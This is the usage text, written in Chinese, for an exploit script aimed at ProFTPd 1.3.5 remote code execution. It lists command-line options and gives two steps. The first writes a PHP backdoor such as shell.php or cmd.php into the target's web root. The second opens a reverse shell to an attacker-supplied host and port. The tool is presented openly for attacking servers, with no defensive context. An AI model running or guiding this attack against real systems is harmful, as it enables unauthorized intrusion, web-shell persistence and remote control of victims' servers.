ProFTPd 1.3.5 RCE
用法: ProFTPD.py [选项]
选项:
-h, --help 显示此帮助信息并退出
-l LHOST, --lhost=LHOST
反弹 Shell 所需的本地 IP,
-p LPORT, --lport=LPORT
反弹 Shell 所需的端口,
-t TARGET, --target=TARGET
存在漏洞的目标,
-d DIRECTORY, --dir=DIRECTORY
上传后门的 Web 根目录,默认: /var/www/html
-c COMMAND, --command=COMMAND
系统命令,
-f FILE, --file=FILE
后门文件名,默认: shell.php。
步骤 1 - 将后门写入目标机器!
用法: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
步骤 2 - 获取 Shell!!
用法: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242